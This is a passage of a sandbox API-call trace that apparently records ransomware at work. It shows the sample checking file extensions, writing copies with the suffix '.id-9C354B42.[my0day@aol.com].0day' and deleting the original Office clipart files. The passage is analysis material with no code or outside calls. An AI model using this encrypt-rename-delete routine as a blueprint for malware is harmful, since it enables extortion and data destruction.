(lpString=".dbf") returned 4 [0053.847] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.847] lstrlenW (lpString=".1cd") returned 4 [0053.847] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.847] lstrlenW (lpString=".jpg") returned 4 [0053.847] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.864] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.864] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.864] GetLastError () returned 0x0 [0053.864] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xbd2, lpOverlapped=0x0) returned 1 [0053.865] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xbe0, lpOverlapped=0x0) returned 1 [0053.866] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.866] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.866] SetEndOfFile (hFile=0x240) returned 1 [0053.867] CloseHandle (hObject=0x240) returned 1 [0053.867] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.867] SetEndOfFile (hFile=0x23c) returned 1 [0053.867] CloseHandle (hObject=0x23c) returned 1 [0053.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.868] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00010_.wmf")) returned 1 [0053.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.868] lstrlenW (lpString=".doc") returned 4 [0053.868] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.868] lstrlenW (lpString=".docx") returned 5 [0053.868] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.868] lstrlenW (lpString=".pdf") returned 4 [0053.868] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.868] lstrlenW (lpString=".xls") returned 4 [0053.868] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.868] lstrlenW (lpString=".xlsx") returned 5 [0053.868] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.868] lstrlenW (lpString=".ppt") returned 4 [0053.868] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.868] lstrlenW (lpString=".zip") returned 4 [0053.868] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.868] lstrlenW (lpString=".rar") returned 4 [0053.868] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.868] lstrlenW (lpString=".bz2") returned 4 [0053.868] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.868] lstrlenW (lpString=".7z") returned 3 [0053.869] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.869] lstrlenW (lpString=".dbf") returned 4 [0053.869] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.869] lstrlenW (lpString=".1cd") returned 4 [0053.869] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00010_.WMF") returned 63 [0053.869] lstrlenW (lpString=".jpg") returned 4 [0053.869] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.869] GetFileSizeEx (in: hFile=0x23c, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=20578) returned 1 [0053.869] CloseHandle (hObject=0x23c) returned 1 [0053.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf")) returned 0x20 [0053.869] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0053.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0053.869] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.869] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.870] GetLastError () returned 0x0 [0053.870] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x5062, lpOverlapped=0x0) returned 1 [0053.871] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x5070, lpOverlapped=0x0) returned 1 [0053.873] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.873] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.873] SetEndOfFile (hFile=0x240) returned 1 [0053.873] CloseHandle (hObject=0x240) returned 1 [0053.873] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.873] SetEndOfFile (hFile=0x23c) returned 1 [0053.874] CloseHandle (hObject=0x23c) returned 1 [0053.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.874] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00853_.wmf")) returned 1 [0053.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.874] lstrlenW (lpString=".doc") returned 4 [0053.874] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.874] lstrlenW (lpString=".docx") returned 5 [0053.874] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.874] lstrlenW (lpString=".pdf") returned 4 [0053.874] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.874] lstrlenW (lpString=".xls") returned 4 [0053.874] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.874] lstrlenW (lpString=".xlsx") returned 5 [0053.874] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.874] lstrlenW (lpString=".ppt") returned 4 [0053.874] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.874] lstrlenW (lpString=".zip") returned 4 [0053.875] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.875] lstrlenW (lpString=".rar") returned 4 [0053.875] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.875] lstrlenW (lpString=".bz2") returned 4 [0053.875] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.875] lstrlenW (lpString=".7z") returned 3 [0053.875] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.875] lstrlenW (lpString=".dbf") returned 4 [0053.875] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.875] lstrlenW (lpString=".1cd") returned 4 [0053.875] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 63 [0053.875] lstrlenW (lpString=".jpg") returned 4 [0053.875] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.876] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.876] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.876] GetLastError () returned 0x0 [0053.876] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x2a50, lpOverlapped=0x0) returned 1 [0053.878] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x2a60, lpOverlapped=0x0) returned 1 [0053.878] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.878] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.879] SetEndOfFile (hFile=0x240) returned 1 [0053.879] CloseHandle (hObject=0x240) returned 1 [0053.879] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.879] SetEndOfFile (hFile=0x23c) returned 1 [0053.880] CloseHandle (hObject=0x23c) returned 1 [0053.880] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.880] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00914_.wmf")) returned 1 [0053.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.880] lstrlenW (lpString=".doc") returned 4 [0053.880] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.880] lstrlenW (lpString=".docx") returned 5 [0053.880] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.880] lstrlenW (lpString=".pdf") returned 4 [0053.880] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.880] lstrlenW (lpString=".xls") returned 4 [0053.880] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.880] lstrlenW (lpString=".xlsx") returned 5 [0053.880] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.880] lstrlenW (lpString=".ppt") returned 4 [0053.880] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.881] lstrlenW (lpString=".zip") returned 4 [0053.881] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.881] lstrlenW (lpString=".rar") returned 4 [0053.881] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.881] lstrlenW (lpString=".bz2") returned 4 [0053.881] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.881] lstrlenW (lpString=".7z") returned 3 [0053.881] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.881] lstrlenW (lpString=".dbf") returned 4 [0053.881] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.881] lstrlenW (lpString=".1cd") returned 4 [0053.881] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.881] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 63 [0053.881] lstrlenW (lpString=".jpg") returned 4 [0053.881] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.882] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.882] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.882] GetLastError () returned 0x0 [0053.882] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x385c, lpOverlapped=0x0) returned 1 [0053.884] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x3860, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x3860, lpOverlapped=0x0) returned 1 [0053.885] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.885] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.885] SetEndOfFile (hFile=0x240) returned 1 [0053.885] CloseHandle (hObject=0x240) returned 1 [0053.885] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.885] SetEndOfFile (hFile=0x23c) returned 1 [0053.886] CloseHandle (hObject=0x23c) returned 1 [0053.886] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.886] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00932_.wmf")) returned 1 [0053.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.887] lstrlenW (lpString=".doc") returned 4 [0053.887] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.887] lstrlenW (lpString=".docx") returned 5 [0053.887] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.887] lstrlenW (lpString=".pdf") returned 4 [0053.887] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.887] lstrlenW (lpString=".xls") returned 4 [0053.887] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.887] lstrlenW (lpString=".xlsx") returned 5 [0053.887] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.887] lstrlenW (lpString=".ppt") returned 4 [0053.887] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.887] lstrlenW (lpString=".zip") returned 4 [0053.887] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.887] lstrlenW (lpString=".rar") returned 4 [0053.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.887] lstrlenW (lpString=".bz2") returned 4 [0053.887] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.887] lstrlenW (lpString=".7z") returned 3 [0053.887] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.887] lstrlenW (lpString=".dbf") returned 4 [0053.887] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.887] lstrlenW (lpString=".1cd") returned 4 [0053.887] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 63 [0053.887] lstrlenW (lpString=".jpg") returned 4 [0053.887] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.888] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.888] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.888] GetLastError () returned 0x0 [0053.888] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x1ba0, lpOverlapped=0x0) returned 1 [0054.106] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1bb0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1bb0, lpOverlapped=0x0) returned 1 [0054.137] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.137] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.138] SetEndOfFile (hFile=0x240) returned 1 [0055.044] CloseHandle (hObject=0x240) returned 1 [0055.044] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.044] SetEndOfFile (hFile=0x23c) returned 1 [0055.045] CloseHandle (hObject=0x23c) returned 1 [0055.045] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0055.045] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00965_.wmf")) returned 1 [0055.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0055.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0055.431] lstrlenW (lpString=".doc") returned 4 [0055.431] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.431] lstrlenW (lpString=".docx") returned 5 [0055.431] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.432] lstrlenW (lpString=".pdf") returned 4 [0055.432] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.432] lstrlenW (lpString=".xls") returned 4 [0055.432] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.432] lstrlenW (lpString=".xlsx") returned 5 [0055.432] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.432] lstrlenW (lpString=".ppt") returned 4 [0055.432] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0055.432] lstrlenW (lpString=".zip") returned 4 [0055.432] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.432] lstrlenW (lpString=".rar") returned 4 [0055.432] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.432] lstrlenW (lpString=".bz2") returned 4 [0055.432] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.432] lstrlenW (lpString=".7z") returned 3 [0055.432] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0055.432] lstrlenW (lpString=".dbf") returned 4 [0055.432] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0055.432] lstrlenW (lpString=".1cd") returned 4 [0055.432] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00965_.WMF") returned 63 [0055.432] lstrlenW (lpString=".jpg") returned 4 [0055.432] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.560] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.560] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0056.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0056.560] GetLastError () returned 0x0 [0056.560] ReadFile (in: hFile=0x21c, 